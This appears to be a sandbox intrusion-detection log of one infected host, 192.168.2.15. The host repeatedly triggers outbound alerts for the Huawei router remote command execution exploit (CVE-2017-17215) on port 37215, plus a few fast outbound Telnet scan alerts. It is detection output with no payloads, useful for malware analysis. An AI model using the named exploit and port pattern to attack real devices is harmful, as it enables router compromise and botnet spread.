                                          2024-07-26T17:42:22.851139+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597237215192.168.2.1541.113.87.213
                                          2024-07-26T17:42:22.852370+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588437215192.168.2.15157.19.62.113
                                          2024-07-26T17:42:22.895905+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861037215192.168.2.15197.96.107.38
                                          2024-07-26T17:42:24.297382+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3535237215192.168.2.1541.81.115.15
                                          2024-07-26T17:42:23.237998+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081037215192.168.2.15157.6.148.23
                                          2024-07-26T17:42:27.005428+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401837215192.168.2.1541.69.7.86
                                          2024-07-26T17:42:24.473493+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5035837215192.168.2.1541.233.87.97
                                          2024-07-26T17:43:24.574254+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3938237215192.168.2.15197.86.174.115
                                          2024-07-26T17:42:23.254755+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070037215192.168.2.15213.97.112.105
                                          2024-07-26T17:43:24.496351+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571837215192.168.2.1538.149.135.151
                                          2024-07-26T17:42:03.751817+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226237215192.168.2.15157.26.41.8
                                          2024-07-26T17:42:33.101565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445837215192.168.2.15157.28.73.187
                                          2024-07-26T17:42:22.846961+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586037215192.168.2.1541.167.142.160
                                          2024-07-26T17:42:22.848710+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520237215192.168.2.15197.174.75.69
                                          2024-07-26T17:42:23.166545+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4737837215192.168.2.15157.237.142.35
                                          2024-07-26T17:42:52.054806+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465237215192.168.2.1541.151.142.201
                                          2024-07-26T17:42:24.301858+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197437215192.168.2.15197.219.122.85
                                          2024-07-26T17:42:52.052546+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559837215192.168.2.15197.57.135.146
                                          2024-07-26T17:42:22.895360+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827037215192.168.2.15157.160.10.123
                                          2024-07-26T17:42:24.313541+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4058237215192.168.2.1584.34.46.1
                                          2024-07-26T17:42:24.287840+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573437215192.168.2.15197.180.119.91
                                          2024-07-26T17:42:24.320501+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4259237215192.168.2.15197.119.114.214
                                          2024-07-26T17:43:21.683970+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817037215192.168.2.1541.186.224.225
                                          2024-07-26T17:42:23.005059+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474037215192.168.2.1548.151.70.89
                                          2024-07-26T17:42:30.926552+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985637215192.168.2.1541.157.133.12
                                          2024-07-26T17:42:35.410112+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532237215192.168.2.15197.35.74.102
                                          2024-07-26T17:42:52.053910+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294237215192.168.2.15198.182.2.219
                                          2024-07-26T17:42:58.931073+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5416437215192.168.2.15197.190.72.108
                                          2024-07-26T17:42:44.179097+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4378837215192.168.2.15157.54.9.247
                                          2024-07-26T17:43:24.744358+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4863437215192.168.2.15157.102.218.128
                                          2024-07-26T17:42:23.602194+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706437215192.168.2.1541.64.35.71
                                          2024-07-26T17:42:24.222003+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120037215192.168.2.15197.119.249.158
                                          2024-07-26T17:42:56.988461+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5139037215192.168.2.1541.92.132.216
                                          2024-07-26T17:43:22.213085+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772637215192.168.2.15197.102.234.79
                                          2024-07-26T17:42:27.582928+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583037215192.168.2.15197.204.149.101
                                          2024-07-26T17:42:56.988504+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077437215192.168.2.15157.172.196.209
                                          2024-07-26T17:42:24.319648+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868637215192.168.2.15155.192.202.50
                                          2024-07-26T17:42:35.371726+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981437215192.168.2.15197.65.200.155
                                          2024-07-26T17:42:23.195579+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912037215192.168.2.1541.210.89.60
                                          2024-07-26T17:43:27.099046+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1536.203.22.43
                                          2024-07-26T17:42:40.508090+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908837215192.168.2.15157.97.33.171
                                          2024-07-26T17:42:56.991958+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305037215192.168.2.15221.102.213.196
                                          2024-07-26T17:43:24.298927+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329437215192.168.2.15153.193.64.22
                                          2024-07-26T17:42:24.287665+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030637215192.168.2.1541.178.84.90
                                          2024-07-26T17:42:58.931120+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073237215192.168.2.152.119.122.128
                                          2024-07-26T17:42:32.927164+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438437215192.168.2.15157.35.94.210
                                          2024-07-26T17:42:25.612220+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013037215192.168.2.15197.173.151.163
                                          2024-07-26T17:42:02.255120+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.1541.242.228.108
                                          2024-07-26T17:42:22.977009+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379037215192.168.2.1541.11.65.133
                                          2024-07-26T17:42:40.406693+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4401637215192.168.2.1599.20.86.61
                                          2024-07-26T17:43:00.592506+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3691837215192.168.2.1541.120.92.208
                                          2024-07-26T17:42:23.661028+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960637215192.168.2.1541.55.10.170
                                          2024-07-26T17:42:25.520747+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387437215192.168.2.15157.63.65.79
                                          2024-07-26T17:42:38.391929+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404437215192.168.2.15119.41.119.182
                                          2024-07-26T17:43:32.177267+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359837215192.168.2.15197.64.226.235
                                          2024-07-26T17:42:41.972935+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807037215192.168.2.15178.158.124.246
                                          2024-07-26T17:42:03.751901+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891437215192.168.2.15197.1.156.179
                                          2024-07-26T17:42:35.410237+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576837215192.168.2.1581.231.93.24
                                          2024-07-26T17:43:32.377075+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481437215192.168.2.15204.150.224.202
                                          2024-07-26T17:42:03.752072+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995637215192.168.2.1597.254.79.70
                                          2024-07-26T17:42:27.003890+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718437215192.168.2.1541.163.124.3
                                          2024-07-26T17:43:32.158441+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064437215192.168.2.1518.125.183.67
                                          2024-07-26T17:42:54.301870+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4875837215192.168.2.15157.120.247.163
                                          2024-07-26T17:43:10.501151+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851837215192.168.2.1541.125.60.232
                                          2024-07-26T17:42:24.256757+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279237215192.168.2.15197.121.253.62
                                          2024-07-26T17:42:23.275312+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032437215192.168.2.15126.255.146.247
                                          2024-07-26T17:43:10.502982+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625837215192.168.2.15197.75.88.164
                                          2024-07-26T17:42:22.975556+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114437215192.168.2.1541.208.106.86
                                          2024-07-26T17:42:16.209335+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821637215192.168.2.1541.42.124.202
                                          2024-07-26T17:42:03.751815+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811837215192.168.2.1571.49.207.63
                                          2024-07-26T17:42:32.923783+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682437215192.168.2.15197.50.214.20
                                          2024-07-26T17:42:38.336979+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114637215192.168.2.15157.105.178.182
                                          2024-07-26T17:43:10.504314+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.15157.27.21.97
                                          2024-07-26T17:42:24.316412+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478637215192.168.2.15157.61.123.126
                                          2024-07-26T17:42:22.860163+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024837215192.168.2.15197.116.207.198
                                          2024-07-26T17:42:24.256374+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954837215192.168.2.1541.134.228.22
                                          2024-07-26T17:42:22.937919+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176037215192.168.2.15192.17.125.10
                                          2024-07-26T17:42:24.287930+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4344837215192.168.2.1541.75.245.73
                                          2024-07-26T17:43:32.302811+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899637215192.168.2.15157.1.195.42
                                          2024-07-26T17:42:23.545190+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3985637215192.168.2.15157.87.177.118
                                          2024-07-26T17:43:12.149134+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829437215192.168.2.15146.76.68.31
                                          2024-07-26T17:42:04.890855+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818037215192.168.2.15107.181.49.106
                                          2024-07-26T17:42:22.851209+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4844837215192.168.2.1561.22.190.108
                                          2024-07-26T17:42:23.045155+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137637215192.168.2.152.38.61.27
                                          2024-07-26T17:42:23.195780+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333437215192.168.2.15197.151.238.8
                                          2024-07-26T17:42:24.485053+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058837215192.168.2.15197.93.43.13
                                          2024-07-26T17:42:03.751950+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5267837215192.168.2.1541.248.110.12
                                          2024-07-26T17:42:23.159195+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617437215192.168.2.15157.63.211.250
                                          2024-07-26T17:43:00.381780+0200TCP2008230ET SCAN Behavioral Unusually fast outbound Telnet Connections, Potential Scan or Brute Force5972823192.168.2.1544.17.242.63
                                          2024-07-26T17:42:03.752078+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.15197.132.184.94
                                          2024-07-26T17:43:34.316507+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.15195.140.93.82
                                          2024-07-26T17:42:03.751909+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028837215192.168.2.1552.37.40.88
                                          2024-07-26T17:43:02.605212+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023237215192.168.2.15197.234.180.170
                                          2024-07-26T17:43:34.311470+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4785037215192.168.2.15157.245.32.35
                                          2024-07-26T17:42:22.866774+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148437215192.168.2.15197.130.107.44
                                          2024-07-26T17:43:32.175180+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213637215192.168.2.15197.92.59.10
                                          2024-07-26T17:43:10.506106+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307037215192.168.2.15157.106.151.177
                                          2024-07-26T17:42:46.315845+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673637215192.168.2.1541.116.40.233
                                          2024-07-26T17:42:40.393104+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5029037215192.168.2.15157.13.60.238
                                          2024-07-26T17:42:22.988596+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.15157.94.4.152
                                          2024-07-26T17:42:24.228000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3325637215192.168.2.15157.122.19.30
                                          2024-07-26T17:42:51.609205+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3973037215192.168.2.1541.160.14.148
                                          2024-07-26T17:42:52.052390+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3815837215192.168.2.15197.140.108.246
                                          2024-07-26T17:43:06.886909+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5735637215192.168.2.1539.65.67.108
                                          2024-07-26T17:42:00.341021+0200TCP2008230ET SCAN Behavioral Unusually fast outbound Telnet Connections, Potential Scan or Brute Force1363823192.168.2.1532.112.195.224
                                          2024-07-26T17:42:24.803633+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228837215192.168.2.1541.167.188.118
                                          2024-07-26T17:42:38.336981+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463437215192.168.2.15197.41.70.190
                                          2024-07-26T17:42:38.393500+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.15197.246.189.242
                                          2024-07-26T17:42:00.299767+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561437215192.168.2.1541.198.97.150
                                          2024-07-26T17:43:10.501410+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193437215192.168.2.15157.146.158.60
                                          2024-07-26T17:42:23.591388+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5505237215192.168.2.15197.157.241.85
                                          2024-07-26T17:42:24.287799+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097437215192.168.2.15153.180.1.96
                                          2024-07-26T17:43:00.563591+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445237215192.168.2.1593.92.209.138
                                          2024-07-26T17:42:24.297544+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546437215192.168.2.1541.208.134.218
                                          2024-07-26T17:42:24.463324+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4162837215192.168.2.1541.98.155.52
                                          2024-07-26T17:42:22.893675+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5719237215192.168.2.15217.255.162.157
                                          2024-07-26T17:42:38.375828+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157237215192.168.2.1541.221.94.239
                                          2024-07-26T17:42:54.174469+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734037215192.168.2.15197.34.208.24
                                          2024-07-26T17:42:35.406729+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134637215192.168.2.15157.178.116.233
                                          2024-07-26T17:42:03.751947+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587237215192.168.2.1541.129.68.49
                                          2024-07-26T17:42:22.812855+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897637215192.168.2.15157.157.132.237
                                          2024-07-26T17:42:22.853896+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709437215192.168.2.15197.255.12.216
                                          2024-07-26T17:42:38.336977+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4069237215192.168.2.15197.117.124.176
                                          2024-07-26T17:42:56.988818+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647037215192.168.2.15197.94.183.214
                                          2024-07-26T17:43:00.506913+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5495437215192.168.2.1541.126.190.106
                                          2024-07-26T17:42:24.454733+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577437215192.168.2.15157.105.86.72
                                          2024-07-26T17:43:06.797400+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818037215192.168.2.15211.48.92.231
                                          2024-07-26T17:42:23.616440+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851237215192.168.2.15157.35.116.97
                                          2024-07-26T17:42:51.608904+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4520637215192.168.2.15157.205.52.253
                                          2024-07-26T17:43:21.678989+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.15157.90.200.178
                                          2024-07-26T17:42:27.586204+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5458237215192.168.2.15197.140.206.190
                                          2024-07-26T17:43:24.357902+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4066837215192.168.2.1568.45.142.254
                                          2024-07-26T17:42:38.401646+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644037215192.168.2.15197.21.204.251
                                          2024-07-26T17:42:54.101696+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5211837215192.168.2.15157.93.60.103
                                          2024-07-26T17:42:23.237927+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4483837215192.168.2.15157.67.97.71
                                          2024-07-26T17:42:30.815681+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769237215192.168.2.1541.6.18.203
                                          2024-07-26T17:42:22.970194+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749837215192.168.2.15197.39.222.54
                                          2024-07-26T17:43:00.441812+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839837215192.168.2.15157.157.191.230
                                          2024-07-26T17:42:23.617803+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047837215192.168.2.1541.229.153.155
                                          2024-07-26T17:43:10.648359+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5799837215192.168.2.15197.224.231.189
                                          2024-07-26T17:42:22.985864+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4583837215192.168.2.15197.230.227.35
                                          2024-07-26T17:42:22.879542+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420237215192.168.2.15197.76.235.85
                                          2024-07-26T17:43:32.380501+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368237215192.168.2.15197.93.156.144
                                          2024-07-26T17:42:44.271157+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4028237215192.168.2.1541.71.10.243
                                          2024-07-26T17:42:44.231489+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695037215192.168.2.15157.121.172.96
                                          2024-07-26T17:43:16.840046+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814437215192.168.2.15157.61.56.236
                                          2024-07-26T17:42:24.521300+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4726837215192.168.2.15197.100.159.198
                                          2024-07-26T17:42:56.990565+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.15222.110.5.133
                                          2024-07-26T17:42:22.943465+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193437215192.168.2.1523.147.182.187
                                          2024-07-26T17:42:45.304300+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062837215192.168.2.15126.206.120.7
                                          2024-07-26T17:42:23.056769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002037215192.168.2.15163.157.201.25
                                          2024-07-26T17:42:27.003689+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978837215192.168.2.1541.179.21.207
                                          2024-07-26T17:42:22.856108+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849437215192.168.2.15157.240.175.32
                                          2024-07-26T17:42:24.287422+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5957237215192.168.2.15197.247.67.99
                                          2024-07-26T17:42:40.497702+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3333437215192.168.2.15197.35.214.62
                                          2024-07-26T17:42:03.751870+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3879837215192.168.2.15180.146.243.119
                                          2024-07-26T17:42:22.896586+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781237215192.168.2.15157.194.249.71
                                          2024-07-26T17:42:24.511474+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333437215192.168.2.15197.14.134.65
                                          2024-07-26T17:42:03.751998+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166837215192.168.2.1541.200.148.42
                                          2024-07-26T17:42:24.509979+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584837215192.168.2.15157.232.73.119
                                          2024-07-26T17:42:52.051540+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3481637215192.168.2.1541.250.30.37
                                          2024-07-26T17:42:22.831517+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384037215192.168.2.1541.246.125.122
                                          2024-07-26T17:42:52.052769+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.15157.17.17.92
                                          2024-07-26T17:42:24.287552+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4879837215192.168.2.15157.165.241.7
                                          2024-07-26T17:42:24.511473+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5288437215192.168.2.15197.192.99.218
                                          2024-07-26T17:42:23.645944+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775037215192.168.2.15106.205.211.61
                                          2024-07-26T17:42:24.323922+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242237215192.168.2.15123.249.101.104
                                          2024-07-26T17:43:29.172763+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630437215192.168.2.1541.102.169.112
                                          2024-07-26T17:42:38.336975+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4186637215192.168.2.15157.65.169.133
                                          2024-07-26T17:42:22.856279+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754037215192.168.2.15197.79.237.252
                                          2024-07-26T17:42:03.752000+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4368637215192.168.2.15197.157.37.218
                                          2024-07-26T17:42:03.751871+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851637215192.168.2.15157.119.221.61
                                          2024-07-26T17:43:24.352835+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723037215192.168.2.15197.130.202.70
                                          2024-07-26T17:42:32.923394+0200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888037215192.168.2.1541.20.158.239
